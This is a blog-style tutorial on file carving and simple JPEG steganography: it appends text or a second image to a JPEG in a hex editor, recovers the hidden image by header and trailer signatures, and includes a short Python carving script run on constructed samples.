Do you see the header and trailer of JPG in this 'MP3' file? Can you suspect this MP3 file to be a JPG file?

To validate your assumption, just change the file extension to .jpg and see what it has in store for you.
Else, just open that mp3 file with your default image viewer.

Sounds interesting, right?
This is what any data carving tool actually does. It identifies a file by its signature in the raw data and bounds the file between its header and trailer, to save it with the extension associated with it, be it JPG, GIF, MP3, or a .doc file.

Now, let's try adding some data to obama.jpg - a simple text line will do.


To do it, just open your obama.jpg file in HxD.

At the end of the file, add some content - A statement will do.
It's as simple as follows:

This can be done simply by typing.
(The content in red is what I have added).

Just save the file with any name with extension .jpg
Let me save it with obama.jpg itself.

Let's open obama.jpg with HxD and see what we find.

Voila! We can see that text in the hex data, and even the image opens flawlessly in your image viewers.

This is a basic example of applying steganography to add text in an image file.

Now let's work on a concept where we apply steganography to add an image to an image file.


For this let's take two images - obama.jpg and osama.jpg

To-do: Hide osama.jpg into obama.jpg

1. Open both the files (obama.jpg and osama.jpg) in HxD.

2. Hit 'Ctrl + N' to open a new blank window.

3. Copy the whole content from obama.jpg and paste it into the new window

4. Copy the whole content from osama.jpg and paste it at the end of the file in the new window.

5. Save as magic.jpg

6. That's it! Now check how the thumbnail looks in the place where you saved magic.jpg

Do you 'see' the difference between the original obama.jpg and this magic.jpg?

No! Right? Let's try opening it in your image viewer.

Do you see Osama anywhere in the pic? If you see him, you haven't got good sleep I suppose. ;)
I understand hallucination too! ;)

Simple, right? Now if you ask me where has Osama gone?

File Carving has the answer! :)


Let's apply the file carving technique learnt earlier in this post.

1. Open magic.jpg in HxD.

2. Now hit 'Ctrl + F' and type in "ÿØÿà" (without quotes) and hit enter. Hit F3 to find next match.

As you can see in this screenshot, you can find two matches for the text-string "ÿØÿà" - One being the start of the file, and the one shown in this screenshot.
This can simply mean that there are two images in the image we are analysing.

Let's try to retrieve / extract that image data now.

3. Copy the content from the 2nd "ÿØÿà" to the end of the file, or probably till the next "ÿÙ" which marks the end of a JPG file, and paste it into a new blank HxD window.

4. Save the file as 'magic revealed.jpg'

5. Open 'magic revealed.jpg' in your image viewer.

Voila! The magic has been revealed!

This is the simple 'logic' behind steganography and File Carving.
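What the hex-editor walkthrough does by hand (find every "ÿØÿà" header, cut at the next "ÿÙ" trailer, save each piece) is also what the earlier description of a carving tool amounts to, and it takes only a few lines to automate. The block below is an added example, not the post's own code or any particular carving tool: it carves every JPEG out of a byte blob by header and trailer, reports what is appended after the last trailer (which is where the text line from the first experiment ends up), and runs over constructed stand-ins for obama.jpg, osama.jpg and magic.jpg rather than the real pictures.

```python
import re

# A JPEG starts with the SOI marker FF D8 followed by an APPn marker (FF E0 JFIF,
# FF E1 Exif, FF E8 SPIFF, the three the post lists) and ends with EOI = FF D9.
JPEG_HEADER = re.compile(rb"\xff\xd8\xff[\xe0\xe1\xe8]")
JPEG_TRAILER = b"\xff\xd9"


def carve_jpegs(blob):
    """Return every JPEG found in the blob as (start, end, data), bounding each
    file between a header and the nearest trailer that follows it. A header
    with no trailer after it is returned as a truncated file running to EOF."""
    carved = []
    pos = 0
    while True:
        m = JPEG_HEADER.search(blob, pos)
        if not m:
            break
        start = m.start()
        end = blob.find(JPEG_TRAILER, start + 4)
        if end == -1:
            carved.append((start, len(blob), blob[start:]))
            break
        end += len(JPEG_TRAILER)
        carved.append((start, end, blob[start:end]))
        pos = end
    return carved


def trailing_bytes(blob):
    """Whatever follows the last EOI marker: the place where text or another file
    can be appended without the image viewer ever complaining."""
    last = blob.rfind(JPEG_TRAILER)
    return b"" if last == -1 else blob[last + len(JPEG_TRAILER):]


def inspect(blob):
    """Summarise what a carver sees versus what a viewer shows (only the first image)."""
    files = carve_jpegs(blob)
    return {
        "jpeg_count": len(files),
        "offsets": [(s, e) for s, e, _ in files],
        "appended_bytes": len(trailing_bytes(blob)),
    }


def fake_jpeg(payload):
    """Constructed stand-in for an image: JFIF header, filler, EOI trailer."""
    return b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + payload + JPEG_TRAILER


# Constructed samples mirroring the post: two images, their concatenation
# (magic.jpg), and an image with a text line appended after its trailer.
OBAMA = fake_jpeg(b"A" * 40)
OSAMA = fake_jpeg(b"B" * 60)
MAGIC = OBAMA + OSAMA
WITH_TEXT = OBAMA + b"The Logical Kid was here"


if __name__ == "__main__":
    print(inspect(MAGIC))
    second = carve_jpegs(MAGIC)[1][2]
    print("hidden image recovered intact:", second == OSAMA)
    print("bytes after trailer:", trailing_bytes(WITH_TEXT))
```

Two caveats a real carver has to deal with: a JPEG with an embedded Exif thumbnail contains a second complete SOI..EOI inside its APP1 segment, so cutting at the nearest FF D9 would stop early and the carver has to walk the marker segments instead; and the check here is only for JPEG, so a file of another type concatenated after the trailer shows up only as "appended bytes" until a signature for it is added.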

Keep exploring, to learn the nuances of increasing the efficiency of File Carving and also to decrypt files on which advanced steganography techniques were applied.

For more details on File signature of various file types, and various other references, visit:
File Signatures (A site by Gary Kessler)

Happy exploring!

Feel free to share your views on this post. Any suggestions to make it better are always welcome.

You can find me on:
Facebook | Twitter | LinkedIn | Google

"Every expert was once a noob!"


Regards,
itsmeRiF
The Logical Kid